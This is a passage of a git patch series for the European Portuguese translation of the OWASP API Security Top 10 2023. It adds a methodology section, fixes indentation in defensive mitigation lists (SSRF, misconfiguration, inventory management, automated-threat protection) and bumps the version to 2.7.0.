nor their exploitation is different. - -Our goal is to increase the awareness of security risks that deserve special -attention in APIs. +# Metodologia e Dados + +## Preâmbulo + +Para esta atualização da lista, a equipa de Segurança de API da OWASP utilizou a +mesma metodologia adotada com sucesso para a lista de 2019, com a adição de um +[Pedido Público por Dados][1] de 3 meses. Infelizmente, este pedido não resultou +em dados que permitissem uma análise estatística relevante sobre os problemas de +segurança de API mais comuns. + +Contudo, com uma indústria de segurança de API mais madura e capaz de fornecer +feedback e informações diretamente, o processo de atualização avançou usando a +mesma metodologia de antes. + +Chegados a este ponto, acreditamos ter um bom documento de consciencialização +para os próximos três ou quatro anos, mais focado nas questões específicas das +APIs modernas. O objetivo deste projeto não é substituir outras listas de top +10, mas sim cobrir os principais riscos de segurança de API atuais e emergentes, +sobre os quais acreditamos que a indústria deve estar atenta e ser diligente. + +## Metodologia + +Na primeira fase, dados publicamente disponíveis sobre incidentes de segurança +em APIs foram recolhidos, revistos e categorizados. Esses dados foram obtidos de +plataformas de _bug bounty_ e relatórios públicos. Apenas problemas reportados +entre 2019 e 2022 foram considerados. Esses dados ajudaram a equipa a entender +em que direção a lista de top 10 anterior deveria evoluir, assim como a lidar +com possíveis vieses dos dados contribuídos. + +Um [Pedido Público por Dados][1] foi realizado de 1 de Setembro a 30 de Novembro +de 2022. Em paralelo, a equipa do projeto iniciou a discussão sobre o que mudou +desde 2019. A discussão incluiu o impacto da primeira lista, o feedback recebido +da comunidade e novas tendências na segurança de APIs. + +A equipa do projeto promoveu reuniões com especialistas sobre ameaças relevantes +à segurança de APIs para obter informações sobre como as vítimas são impactadas +e como essas ameaças podem ser mitigadas. + +Este esforço resultou num rascunho inicial do que a equipa acredita serem os dez +riscos mais críticos de segurança para APIs. A [Metodologia de Classificação de +Risco da OWASP][2] foi utilizada para realizar a análise de riscos. As +classificações de prevalência foram decididas por consenso entre os membros da +equipa do projeto, com base na sua experiência na área. Para considerações sobre +esses temas, consulte a secção [Riscos de Segurança em APIs][3]. + +O rascunho inicial foi então compartilhado para revisão com profissionais de +segurança com experiência relevante na área de segurança de APIs. Os seus +comentários foram analisados, discutidos e, quando aplicável, incluídos no +documento. O documento resultante foi [publicado como uma Versão Candidata][4] +para [discussão aberta][5]. Várias [contribuições da comunidade][6] foram +incorporadas no documento final. + +A lista de contribuidores está disponível na secção de [Agradecimentos][7]. + +## Riscos Específicos de APIs + +A lista foi elaborada para abordar riscos de segurança que são mais específicos +para APIs. + +Não implica que outros riscos genéricos de segurança de aplicações não existam +em aplicações baseadas em APIs. Por exemplo, não incluímos riscos como +"Componentes Vulneráveis e Desatualizados" ou "Injeção", embora você possa +encontrá-los em aplicações baseadas em APIs. Esses riscos são genéricos, não se +comportam de forma diferente em APIs, nem a sua exploração é diferente. + +O nosso objetivo é aumentar a conscientização sobre os riscos de segurança que +merecem atenção especial em APIs. [1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/ [2]: https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology From 2e9e5cd19b23a0d6313a886d4308d6a212e17d68 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:09:50 +0000 Subject: [PATCH 59/64] Update 0xb1-next-devsecops.md --- editions/2023/pt-pt/0xb1-next-devsecops.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xb1-next-devsecops.md b/editions/2023/pt-pt/0xb1-next-devsecops.md index 750715bed..44b5284cb 100644 --- a/editions/2023/pt-pt/0xb1-next-devsecops.md +++ b/editions/2023/pt-pt/0xb1-next-devsecops.md @@ -1,4 +1,4 @@ -# O que Se Segue Para DevSecOps +# O Que Se Segue Para DevSecOps Dada a sua importância na arquitetura das aplicações modernas, desenvolver APIs seguras é crucial. A segurança não pode ser negligenciada e deve estar presente From 6d6e62cb84ed641468ea4fff6709e3d2148e5918 Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:13:38 +0000 Subject: [PATCH 60/64] Update 0xa6-unrestricted-access-to-sensitive-business-flows.md --- ...cted-access-to-sensitive-business-flows.md | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index e419ed906..e20a5553c 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md @@ -81,25 +81,25 @@ O planeamento da mitigação deve ser feito em duas camadas: * Engenharia - escolher os mecanismos de proteção adequados para mitigar o risco empresarial. - Alguns dos mecanismos de proteção são mais simples, enquanto outros são mais - difíceis de implementar. Os seguintes métodos são utilizados para desacelerar - ameaças automatizadas: - - * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente - inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes - usem soluções mais sofisticadas, tornando-as mais caras para eles. - * Deteção humana: utilize _captcha_ ou soluções biométricas mais avançadas - (e.g. padrões de digitação). - * Padrões não humanos: analisar o fluxo do utilizador para detetar padrões - não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e - "finalizar compra" em menos de um segundo). - * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem - conhecidos. - - Proteja e limite o acesso às APIs que são consumidas diretamente por máquinas - (como APIs para desenvolvedores e B2B). Elas tendem a ser um alvo fácil para - atacantes, pois muitas vezes não implementam todos os mecanismos de proteção - necessários. + Alguns dos mecanismos de proteção são mais simples, enquanto outros são mais + difíceis de implementar. Os seguintes métodos são utilizados para desacelerar + ameaças automatizadas: + + * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente + inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes + usem soluções mais sofisticadas, tornando-as mais caras para eles. + * Deteção humana: utilize _captcha_ ou soluções biométricas mais avançadas + (e.g. padrões de digitação). + * Padrões não humanos: analisar o fluxo do utilizador para detetar padrões + não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e + "finalizar compra" em menos de um segundo). + * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem + conhecidos. + + Proteja e limite o acesso às APIs que são consumidas diretamente por máquinas + (como APIs para desenvolvedores e B2B). Elas tendem a ser um alvo fácil para + atacantes, pois muitas vezes não implementam todos os mecanismos de proteção + necessários. ## Referências From f87e9b93afd358685f040952758ae84a3317187f Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:14:23 +0000 Subject: [PATCH 61/64] Update 0xa7-server-side-request-forgery.md --- editions/2023/pt-pt/0xa7-server-side-request-forgery.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index c40de1574..ea8d7ffac 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -135,10 +135,10 @@ visualizar as credenciais do ambiente de nuvem. * Isole o mecanismo de obtenção de recursos na sua rede: geralmente, essas funcionalidades são destinadas a recuperar recursos remotos e não internos. * Sempre que possível, utilize listas de permissões de: - * Origens remotas das quais se espera que os utilizadores façam download de - recursos (por exemplo, Google Drive, Gravatar, etc.) - * Esquemas de URL e portas - * Tipos de media aceites para uma determinada funcionalidade + * Origens remotas das quais se espera que os utilizadores façam download de + recursos (por exemplo, Google Drive, Gravatar, etc.) + * Esquemas de URL e portas + * Tipos de media aceites para uma determinada funcionalidade * Desative redirecionamentos HTTP. * Utilize um URL _parser_ bem testado e mantido para evitar problemas causados por inconsistências no processamento de URLs. From 966d61408daea85fa9465155ca59ddeafa47f45a Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:14:52 +0000 Subject: [PATCH 62/64] Update 0xa8-security-misconfiguration.md --- editions/2023/pt-pt/0xa8-security-misconfiguration.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2023/pt-pt/0xa8-security-misconfiguration.md b/editions/2023/pt-pt/0xa8-security-misconfiguration.md index 0ac606783..c1a7a3bee 100644 --- a/editions/2023/pt-pt/0xa8-security-misconfiguration.md +++ b/editions/2023/pt-pt/0xa8-security-misconfiguration.md @@ -88,9 +88,9 @@ E ainda: outros verbos HTTP devem ser desativados (por exemplo, HEAD). * As APIs que esperam ser acedidas a partir de clientes baseados em navegador (por exemplo, aplicação web _front-end_) devem, pelo menos: - * implementar uma política adequada de Partilha de Recursos entre Origens - (CORS). - * incluir os Cabeçalhos de Segurança aplicáveis. + * implementar uma política adequada de Partilha de Recursos entre Origens + (CORS). + * incluir os Cabeçalhos de Segurança aplicáveis. * Restrinja os tipos de conteúdo/formatos de dados recebidos àqueles que cumprem os requisitos funcionais/de negócio. * Assegure que todos os servidores na cadeia de servidores HTTP (por exemplo, From 779ed5c357ac5e4f2b5ae5a4573954a68d23e5ec Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Sun, 3 Nov 2024 09:15:42 +0000 Subject: [PATCH 63/64] Update 0xa9-improper-inventory-management.md --- .../pt-pt/0xa9-improper-inventory-management.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/editions/2023/pt-pt/0xa9-improper-inventory-management.md b/editions/2023/pt-pt/0xa9-improper-inventory-management.md index 6a6c1ca12..bad6bdece 100644 --- a/editions/2023/pt-pt/0xa9-improper-inventory-management.md +++ b/editions/2023/pt-pt/0xa9-improper-inventory-management.md @@ -19,11 +19,11 @@ Uma API tem um "ponto cego de documentação" se: * O propósito de um _host_ da API é pouco claro e não há respostas explícitas para as seguintes perguntas: - * Em que ambiente está a API a ser executada (por exemplo, produção, - _staging_, teste, desenvolvimento)? - * Quem deve ter acesso à rede da API (por exemplo, público, interno, - parceiros)? - * Qual versão da API está em execução? + * Em que ambiente está a API a ser executada (por exemplo, produção, + _staging_, teste, desenvolvimento)? + * Quem deve ter acesso à rede da API (por exemplo, público, interno, + parceiros)? + * Qual versão da API está em execução? * Não existe documentação ou a documentação existente não está atualizada. * Não existe um plano de desativação para cada versão da API. * O inventário do _host_ está em falta ou desatualizado. @@ -36,9 +36,9 @@ Uma API tem um "ponto cego de fluxo de dados" se: * Existe um "fluxo de dados sensíveis" onde a API compartilha dados sensíveis com um terceiro e - * Não existe uma justificação de negócio ou aprovação do fluxo - * Não existe inventário ou visibilidade do fluxo - * Não há visibilidade detalhada sobre o tipo de dados sensíveis partilhados + * Não existe uma justificação de negócio ou aprovação do fluxo + * Não existe inventário ou visibilidade do fluxo + * Não há visibilidade detalhada sobre o tipo de dados sensíveis partilhados ## Exemplos de Cenários de Ataque From afd84573a04c15599a533ac29ffb9290aa1c61fb Mon Sep 17 00:00:00 2001 From: PauloASilva Date: Tue, 31 Dec 2024 12:00:49 +0000 Subject: [PATCH 64/64] Bump version to 2.7.0 --- VERSION | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/VERSION b/VERSION index 914ec9671..9aa34646d 100644 --- a/VERSION +++ b/VERSION @@ -1 +1 @@ -2.6.0 \ No newline at end of file +2.7.0 \ No newline at end of file